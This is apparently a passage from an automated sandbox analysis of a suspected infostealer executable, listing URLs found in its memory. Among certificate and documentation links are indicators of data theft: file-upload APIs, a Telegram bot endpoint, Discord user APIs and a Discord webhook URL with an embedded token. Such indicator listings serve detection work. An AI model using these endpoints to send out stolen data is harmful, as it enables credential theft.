              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2885316620.0000000007280000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: KpHYfxnJs6.exe, 00000004.00000002.2886022937.0000000007440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: KpHYfxnJs6.exe, 00000004.00000002.2885316620.0000000007280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
              Source: powershell.exe, 0000000E.00000002.2545646683.0000000006036000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2707327914.00000000046F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2889989783.00000000078A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: KpHYfxnJs6.exe, 00000004.00000003.2479999836.0000000007545000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479814100.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: KpHYfxnJs6.exe, 00000004.00000003.2480053850.000000000750B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479932107.0000000007506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: KpHYfxnJs6.exe, 00000004.00000003.2479999836.0000000007545000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479814100.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: KpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000E.00000002.2538439375.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2707327914.00000000046F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895190673.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: KpHYfxnJs6.exe, 00000004.00000003.2481397631.0000000007600000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2887221002.0000000007710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: KpHYfxnJs6.exe, 00000004.00000002.2893281849.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2741428739.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743894441.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2683915266.0000000007B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051155474.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894515812.0000000007E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPD
              Source: KpHYfxnJs6.exe, 00000004.00000003.2743545312.0000000007A22000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2893281849.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2891965646.0000000007A22000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2741428739.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743894441.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2683915266.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2683735538.0000000007A20000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895190673.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2477289912.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2466905986.0000000004E66000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2475127207.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484207815.0000000004E0A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2476647140.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2474208164.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484268459.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484460219.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2466344184.0000000004E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
